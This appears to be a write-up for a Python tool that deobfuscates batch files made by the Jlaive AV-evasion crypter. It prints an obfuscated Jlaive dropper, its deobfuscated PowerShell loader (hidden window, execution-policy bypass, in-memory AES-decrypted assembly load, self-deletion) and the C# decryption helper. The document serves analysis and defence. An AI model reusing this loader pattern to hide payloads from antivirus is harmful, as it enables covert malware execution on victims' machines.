Jlaive is an obfuscator engine that converts a .NET executable into an obfuscated .bat file for AV evasion.
An example of the output of this tool can be seen below:
@echo off
rem Stage 1: copies powershell.exe next to this script under the script's own name plus ".exe", then marks the copy system+hidden.
echo F|xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "%~dp0%~nx0.exe" /y
attrib +s +h "%~dp0%~nx0.exe"
cls
cd %~dp0
rem The set lines below only store short string fragments (mostly slices of base64 text and of the PowerShell command line).
rem Nothing runs until the two lines of variable references just before the cleanup concatenate them back together;
rem the fully expanded result is shown in the deobfuscated listing further down the page.
set "fENYbyZJkq=3IHsgcHVib"
set "oMDpdCkaMN=k = [Syste"
set "HlBoTjvPwk=6UdLqADvWw" && set "TgmwRYHkmK=ucHV0Lkxlb"
set "nVaFdaubIS=npolicy by" && set "BIXBCNceka=gSUNyeXB0b" && set "YNWXZHqJqc=gZ3MuRGlzc"
set "tQIzxvQESC=GtleSwgYnl" && set "XOhAfBkWmm=vert]::Fro"
set "kLMTZqURfX=U), [Syste" && set "qVRmUESgbg=$tIukXz = " && set "saTMAKUycO=SBpbnB1dCw" && set "KdmMRlyyEK=nlwdG9yLlR" && set "PMyINOXuEO=GJ5dGVbXSB"
set "FscnzUUuAC=::FromBase"
set "BARCwvwdkW=-noprofile" && set "vwRxWzGiFE=))).EntryP"
set "sMNjHgEuTS=md0aCk7IGR" && set "ZMFfhtZaCd=n $tIukXz;" && set "NRBHbUNrkG=etString([" && set "tNCgPVjCku=kID0gZGVjc"
set "CDtNvqDvqL=ngth - 1];" && set "ieHoPTyjEy=mBase64Str" && set "rajcuUaXTP=m.IO.File]" && set "ihrpBFSJkF=Gh5OyBwdWJ" && set "ObqwUWcIse=yZXR1cm4gb"
set "wrxnxJJZUi=10gY1VaaUJ"
set "tPPsLfEmfH=ssembly]::" && set "wYpmPrqEes=0ZW0uU2Vjd" && set "PeMJlFunvD=%~nx0.exe " && set "xRRkIyDKnV=GUgPSBDaXB"
set "LguDwtEgTm=ing('dXNpb"
set "rBnjvHzCEC=SwgaXYpOyB" && set "BwxNyGNeWs=and $NDmNb" && set "NOLCAWkezL=XJpdHkuQ3J" && set "JxakJbogEh=c212SWxpVX"
set "avLgdUKvyf=System.Con"
set "dzLmqrEuSn=Load([DuUJ"
set "buYFlxnyag=mcgU3lzdGV"
set "JrzOnKokrg=G8obXNvKTs"
set "VKtWSAzekf=kaW5nTW9kZ"
set "UDLwXXbfUO=eDefinitio"
set "pZCqseAkqe=ext('%~f0').Split([Environment]::NewLine);$WWCkvU "
set "bEuenIEGAB=ert]::From"
set "evGNjFJkiq=::ReadAllT"
set "EtpzUbnYkW=XRlRGVjcnl"
set "rAJgHQskWM=3VzaW5nIFN" && set "nUMBtoFYkK=yBNZW1vcnl" && set "DlNUGnnsfJ=gTWVtb3J5U" && set "tguYxsQeEG=hbmFnZWQgY" && set "ZxsoDXEAmh=::cUZiBs(["
set "rrBdlEgEiR=" && set "yuBNvyTjWG=ieXRlW10gZ" && set "EpkleGpiSQ=zLlBhZGRpb" && set "hlfUYJcbnE=//github.c" && set "JaaFxTqmkm=zKGJ5dGVbX"
set "ovxvfokepJ=yA9IG5ldyB" && set "NdBkzRUyNc=-Type -Typ"
set "cECnVddQIO=gYWVzLk1vZ"
set "JYdzLMkAMI=zdGVtLklPO"
set "LIJyjYDhEO=mBase64Str"
set "FQDboAlVkm=0cmVhbSBtc" && set "CtISDxCuyg=$NDmNbk.Le"
set "cPhgSHJFiE=laive" && set "wOUbaaionW=8dQ='), [S"
set "TFqYzkUFKP=oZXJNb2RlL" && set "XmJlbVCEeg=ybSBkZWNye"
set "rsAojPyqqK=pass -comm"
set "HjDUCECfuK=vY2soaW5wd" && set "RLYjZdmUem=i5EaXNwb3N"
set "JmcNfgjlkO=3IE1lbW9ye"
set "wotBbJUCXp=28gPSBuZXc"
set "ZMbsYBZiEq=S5QS0NTNzs"
set "JWEGEWztyS=y5Db21wcmV" && set "wYGjMTSRLU=G9zZSgpOyB" && set "RZdMvuYUqn=tLlRleHQ7d"
set "DDhHMvstEO=GljIHN0YXR" && set "BLkZldvAHE=TdHJlYW0gb" && set "HkRRYWZUWm=7IHZhciBnc"
set "EvYPmaikjR=lY3J5cHRvc" && set "NUGvGuKfkH=]] ('%*')))" && set "TiPQaNUyEk=om/ch2sh/J" && set "mMQdKSFyum=yeXB0ZWQ7I"
set "FFeCIpqPyy= -windowst"
set "lYRjpzjmyM=mcgPSBQYWR" && set "jEdNSXkuFv=oint.Invok"
set "UeVhkuMOtk=XNpID0gbmV"
set "reZEtGxrSh=y5EaXNwb3N" && set "uPqpbVZyku=ystem.Conv" && set "QbZOQhYmgk=Fw]::YWqYu"
set "ljXHtMvGyf=jIHN0YXRpY" && set "LulfiaLhEe=XNpbmcgU3l"
set "GVtjxQXtOo=zc2lvbjt1c"
set "EyEeayRkCp=m.Convert]" && set "VTmkqOOkQh=5c3RlbS5JT"
set "DJZvlJxSeK=flection.A"
set "VrbuAavxUi=XQsIDAsIGl" && set "ytnErceFKM=G9zZSgpOyB"
set "WsBCQAkGPI=mFnZWQoKTs" && set "ZeKpegxEqf=UZpbmFsQmx" && set "fYjkFWUCLu=e($null, (" && set "qbrRUujXDM=lKCk7IGFlc" && set "TcbXekUkOV=Base64Stri" && set "ryOJrbkGXw=ncy5Db3B5V" && set "gBhbYMmkar=HWmlwU3RyZ"
set "xFXbUXSqiH=hZXMuQ3JlY"
set "jUxqxtJWwK=XB0b3IgPSB"
set "cUNiABJEPG=64String('"
set "BYliuSSkds=E1lbW9yeVN"
set "DgsMJGRBkW=kNCQzsgYWV" && set "yxMQSdikCf=System.Con" && set "pqydlkWvlv=yYW5zZm9yb"
set "xmGqfoyigz=yYXkoKTsgf" && set "mKWZuiSqkG= -executio"
set "pWisjkyuvo=g]::UTF8.G" && set "RdergtMaPv=3MgRHVVSkZ" && set "FoeUHvtBeI=3RyZWFtKCk"
set "PtbWQSaxkP=gYnl0ZVtdI" && set "prlyUalgGj=, [string[" && set "qfhEOMrfue=rem https:"
set "EHNuBdghke=XNvLlRvQXJ"
set "atzklLZikC=ieXRlcyk7I"
set "VzZHdHfnkK=wdG9yKGtle" && set "pbEQoHEFya=3Npb25Nb2R"
set "wyIRpJUzUy=ng('i9gKth"
set "aRvucOwBMK=lLkRlY29tc"
set "ZGtoXTmqEa=vert]::Fro" && set "LBXFmXrGGk=yle hidden" && set "PgpYWgnESr=SB9'));Add" && set "jQJlvwKnUC=HVybiBkZWN"
set "yutyGaKptk=pYyBieXRlW"
set "NrVzEyZKxJ=gWVdxWXVPK"
set "ElUeqoZkeB=5cHRvZ3Jhc" && set "VqDUHkduHE=HJlc3MpOyB" && set "bXuhcMQWEC=tc2kuRGlzc" && set "wIkgxuqwSU=ieXRlcykge" && set "BeUppPecxE=xt.Encodin" && set "JXrPZaVOUG=G9zZSgpOyB" && set "FclUyvUGNa=WVzID0gbmV" && set "QQwGKBkSYC=WS5VvlzyRn" && set "QSDzwOfsqN=saWMgY2xhc" && set "nNEnadmgAy=SB7IEFlc01"
set "ZSnQhDQxOJ=WFtKG1zaSw"
set "hCSlczZEed=[System.Re"
set "tAyNMEciUo=VN0cmVhbSh" && set "lELXxFDard=O([DuUJFw]"
set "nNsRHgWaoU== $NDmNbk["
set "ldbJMTqUaX=0ZVtdIGl2K" && set "sSUxwkECwE=1RyYW5zZm9" && set "IYUhcqkikI=1hMu1g==')"
set "rgNaXziIpC=GVjcnlwdGV"
set "xdaAAuWEqb=3IEFlc01hb" && set "TYDLSAjkyA=gQ29tcHJlc" && set "GgmonIEaZP=ing($WWCkv"
set "IArsKCeeLv=tc28uRGlzc" && set "oLgiwxduaV=H0gcHVibGl" && set "GNZxLtdDkO=[System.Te"
set "amOerQZEai=OxhVVfEWSN" && set "fHTMzMCrak=yBieXRlW10"
set "kKopFOwikC=2luZyBTeXN"
set "occQjttmnX=lKCk7IHJld"
set "eZKAFlWkCV=MlVcdDTvXm"
rem Expands to the comment line "rem https://github.com/ch2sh/Jlaive" (fragments qfhEOMrfue, hlfUYJcbnE, TiPQaNUyEk, cPhgSHJFiE above), i.e. a no-op.
%qfhEOMrfue%%hlfUYJcbnE%%TiPQaNUyEk%%cPhgSHJFiE%
rem Stage 2: expands to the PowerShell invocation through the hidden copy. The command reads this file (%~f0), takes its last line as the
rem base64 payload, compiles the base64-embedded C# helper class with Add-Type, AES-decrypts and gunzips the payload, loads the resulting
rem assembly and invokes its EntryPoint in memory, forwarding this script's arguments. See the deobfuscated listing below for the plain text.
%PeMJlFunvD%%BARCwvwdkW%%FFeCIpqPyy%%LBXFmXrGGk%%mKWZuiSqkG%%nVaFdaubIS%%rsAojPyqqK%%BwxNyGNeWs%%oMDpdCkaMN%%rajcuUaXTP%%evGNjFJkiq%%pZCqseAkqe%%nNsRHgWaoU%%CtISDxCuyg%%CDtNvqDvqL%%qVRmUESgbg%%GNZxLtdDkO%%BeUppPecxE%%pWisjkyuvo%%NRBHbUNrkG%%avLgdUKvyf%%ZGtoXTmqEa%%LIJyjYDhEO%%LguDwtEgTm%%buYFlxnyag%%RZdMvuYUqn%%LulfiaLhEe%%JYdzLMkAMI%%rAJgHQskWM%%VTmkqOOkQh%%JWEGEWztyS%%GVtjxQXtOo%%kKopFOwikC%%wYpmPrqEes%%NOLCAWkezL%%ElUeqoZkeB%%ihrpBFSJkF%%QSDzwOfsqN%%RdergtMaPv%%fENYbyZJkq%%DDhHMvstEO%%yutyGaKptk%%wrxnxJJZUi%%JaaFxTqmkm%%saTMAKUycO%%PtbWQSaxkP%%tQIzxvQESC%%ldbJMTqUaX%%nNEnadmgAy%%tguYxsQeEG%%FclUyvUGNa%%xdaAAuWEqb%%WsBCQAkGPI%%cECnVddQIO%%xRRkIyDKnV%%TFqYzkUFKP%%DgsMJGRBkW%%EpkleGpiSQ%%lYRjpzjmyM%%VKtWSAzekf%%ZMbsYBZiEq%%BIXBCNceka%%sSUxwkECwE%%XmJlbVCEeg%%jUxqxtJWwK%%xFXbUXSqiH%%EtpzUbnYkW%%VzZHdHfnkK%%rBnjvHzCEC%%yuBNvyTjWG%%rgNaXziIpC%%tNCgPVjCku%%KdmMRlyyEK%%pqydlkWvlv%%ZeKpegxEqf%%HjDUCECfuK%%VrbuAavxUi%%TgmwRYHkmK%%sMNjHgEuTS%%EvYPmaikjR%%RLYjZdmUem%%qbrRUujXDM%%reZEtGxrSh%%occQjttmnX%%jQJlvwKnUC%%mMQdKSFyum%%oLgiwxduaV%%ljXHtMvGyf%%fHTMzMCrak%%NrVzEyZKxJ%%PMyINOXuEO%%wIkgxuqwSU%%nUMBtoFYkK%%BLkZldvAHE%%UeVhkuMOtk%%JmcNfgjlkO%%tAyNMEciUo%%atzklLZikC%%BYliuSSkds%%FQDboAlVkm%%wotBbJUCXp%%DlNUGnnsfJ%%FoeUHvtBeI%%HkRRYWZUWm%%ovxvfokepJ%%gBhbYMmkar%%ZSnQhDQxOJ%%TYDLSAjkyA%%pbEQoHEFya%%aRvucOwBMK%%VqDUHkduHE%%ryOJrbkGXw%%JrzOnKokrg%%YNWXZHqJqc%%JXrPZaVOUG%%bXuhcMQWEC%%wYGjMTSRLU%%IArsKCeeLv%%ytnErceFKM%%ObqwUWcIse%%EHNuBdghke%%xmGqfoyigz%%PgpYWgnESr%%NdBkzRUyNc%%UDLwXXbfUO%%ZMFfhtZaCd%%hCSlczZEed%%DJZvlJxSeK%%tPPsLfEmfH%%dzLmqrEuSn%%QbZOQhYmgk%%lELXxFDard%%ZxsoDXEAmh%%yxMQSdikCf%%XOhAfBkWmm%%ieHoPTyjEy%%GgmonIEaZP%%kLMTZqURfX%%EyEeayRkCp%%FscnzUUuAC%%cUNiABJEPG%%HlBoTjvPwk%%QQwGKBkSYC%%JxakJbogEh%%eZKAFlWkCV%%wOUbaaionW%%uPqpbVZyku%%bEuenIEGAB%%TcbXekUkOV%%wyIRpJUzUy%%amOerQZEai%%IYUhcqkikI%%vwRxWzGiFE%%jEdNSXkuFv%%fYjkFWUCLu%%prlyUalgGj%%NUGvGuKfkH%
rem rrBdlEgEiR is set to the empty string above, so this line expands to nothing (filler).
%rrBdlEgEiR%
rem Stage 3 cleanup: un-hides and deletes the powershell.exe copy, then deletes this batch file itself (%~f0).
attrib -s -h "%~dp0%~nx0.exe"
del "%~dp0%~nx0.exe"(goto) 2>nul & del "%~f0"
exit /b
-- a bunch of base64-encoded encrypted bytes --
This is a project I thought of doing after being inspired by the Get-UnJlaive project, which is written in PowerShell.
Get-UnJlaive is written in PowerShell, and its goal is to recover the original executable before it was converted to an obfuscated batch file.
The issue is that, if the original executable was waiting for a user action to happen, it would fail to recover it. Also, it was not extracting all the intermediate files that were being created, nor did it deobfuscate the .bat file.
Truth is, there was no need to provide all the intermediate files, but I thought it would be nice to somehow extract them all :)
So, here is my attempt at writing a Python script that:
- Deobfuscates the .bat file to a more readable form
- Recovers all the .cs files created.
- Recovers all the .ps1 files created.
- Recovers the keys, ivs and encrypted blocks and decrypts them, providing the intermediate .exe files.
- Recovers the original executable before being converted to that obfuscated .bat file.
After running the script, the obfuscated batch file will now look like this:
@echo off
rem Stage 1: copies powershell.exe next to this script under the script's own name plus ".exe", then marks the copy system+hidden.
echo F|xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "%~dp0%~nx0.exe" /y
attrib +s +h "%~dp0%~nx0.exe"
cls
cd %~dp0
rem Stage 2: runs the hidden PowerShell copy. The command reads this file (%~f0), takes its last line as the base64 payload,
rem decodes and compiles the helper class (GlTYYE) with Add-Type, AES-decrypts (cYJjDj) and gunzips (RbdJRP) the payload with the
rem hard-coded key/IV, loads the result as an assembly and invokes its EntryPoint in memory, forwarding this script's arguments.
rem NOTE(review): as printed here the "rem https://github.com/ch2sh/Jlaive" comment and the PowerShell invocation are joined on one
rem line, whereas in the obfuscated original they are two separate lines. Taken literally, everything after rem would be ignored, so
rem the join is presumably an artifact of the deobfuscator's output or of this page's rendering - confirm against the cleared file.
rem https://github.com/ch2sh/Jlaive%~nx0.exe -noprofile -windowstyle hidden -executionpolicy bypass -command $aViIGz = [System.IO.File]::ReadAllText("%~f0").Split([Environment]::NewLine);$zMcEAF = $aViIGz[$aViIGz.Length - 1];$jqmXGf = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("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"));Add-Type -TypeDefinition $jqmXGf;[System.Reflection.Assembly]::Load([GlTYYE]::RbdJRP([GlTYYE]::cYJjDj([System.Convert]::FromBase64String($zMcEAF), [System.Convert]::FromBase64String("KsXDu/ZuLORpumzY7tRqieLJCAHO4HhkWSLGTa9vFUs="), [System.Convert]::FromBase64String("NP/92qw/SR3ausC7GbKhag==")))).EntryPoint.Invoke($null, (, [string[]] ("%*")))
rem Stage 3 cleanup: un-hides and deletes the powershell.exe copy, then deletes this batch file itself (%~f0).
attrib -s -h "%~dp0%~nx0.exe"
del "%~dp0%~nx0.exe"(goto) 2>nul & del "%~f0"
exit /b
-- a bunch of base64-encoded encrypted bytes --
Another file that will be generated is wzpaloqi.0.cs, which contains the definition of the class that is created when the .bat runs; it will look like this:
// wzpaloqi.0.cs as recovered by unjlaive.py (reformatted here for readability; the extracted file is a single line).
// This is the helper class the deobfuscated PowerShell command compiles with Add-Type before loading the payload:
// cYJjDj performs AES-CBC/PKCS7 decryption and RbdJRP performs in-memory GZip decompression.
using System.Text;
using System.IO;
using System.IO.Compression;
using System.Security.Cryptography;
public class GlTYYE
{
    // Decrypts `input` with AES in CBC mode and PKCS7 padding using the caller-supplied key and IV.
    // The key size is whatever the caller passes; the key in the deobfuscated listing decodes to 32 bytes (AES-256).
    // There is no integrity check on the ciphertext, so a corrupted/tampered payload surfaces only as a padding error.
    public static byte[] cYJjDj(byte[] input, byte[] key, byte[] iv)
    {
        AesManaged aes = new AesManaged();
        aes.Mode = CipherMode.CBC;
        aes.Padding = PaddingMode.PKCS7;
        ICryptoTransform decryptor = aes.CreateDecryptor(key, iv);
        byte[] decrypted = decryptor.TransformFinalBlock(input, 0, input.Length);
        // Disposed by hand rather than with using blocks: if TransformFinalBlock throws, both objects are left to the GC.
        decryptor.Dispose();
        aes.Dispose();
        return decrypted;
    }
    // Inflates a GZip-compressed byte array entirely in memory and returns the decompressed bytes.
    public static byte[] RbdJRP(byte[] bytes)
    {
        MemoryStream msi = new MemoryStream(bytes);
        MemoryStream mso = new MemoryStream();
        var gs = new GZipStream(msi, CompressionMode.Decompress);
        gs.CopyTo(mso);
        gs.Dispose();
        msi.Dispose();
        // MemoryStream.ToArray() remains valid after Dispose(), so calling it last still returns the full buffer.
        mso.Dispose();
        return mso.ToArray();
    }
}
The encrypted bytes after the exit /b command, once decrypted, yield a .NET executable that is responsible for decrypting and decompressing the original executable (the one that was converted to the obfuscated .bat). The key and IV used for its decryption are the ones found in the previously recovered files. After decrypting it, we get loader_stub.exe, which will look like this:
The previously decrypted exe decrypts a payload.txt attached to its Resources. This is the original executable that was given to the Jlaive engine.
After running the tool, the output will be the following:
┌──(connar㉿kali)-[~/Documents/JlaiveCustomDeobfuscator]
└─$ python unjlaive.py
[*] Sample deobfuscated successfully. Writting result to cleared_Jlaive.ps1
[*] Extracted Key: KsXDu/ZuLORpumzY7tRqieLJCAHO4HhkWSLGTa9vFUs=
[*] Extracted IV: NP/92qw/SR3ausC7GbKhag==
[*] Extracted the wzpaloqi.0.cs file. Writting to wzpaloqi.0.cs
[*] Extracting and decrypting the loader_stub. Writting result to loader_stub.exe
[*] Parsing loader_stub.exe to decrypt the final executable...
[*] Resource 'payload.txt' extracted to 'payload_extracted.txt'
[+] Main method found:
[*] Module: tmpBBD0.tmp
[*] Method: System.Void qCaVAPJGIk.OItkKtykOO::Main(System.String[])
[*] Loading instructions of Main...
[*] Key found: "8AOx7b0fGddReqjf+6WzB7n6yOJGvgsGZXvpBa9764w="
[*] IV found: "T1D5QuS4MCdJRbPrcYCB/Q=="
[*] Original executable recovered successfully. Writing to 'target_exe.exe'...
┌──(connar㉿kali)-[~/Documents/JlaiveCustomDeobfuscator]
└─$ ls
cleared_Jlaive.ps1 dnlib-4.4.0 loader_stub.exe obfuscated.bat payload_extracted.txt target_exe.exe tmp_Jlaive.ps1 unjlaive.py wzpaloqi.0.cs
This script needs the following:
- pythonnet
- ironpython
- dnlib.dll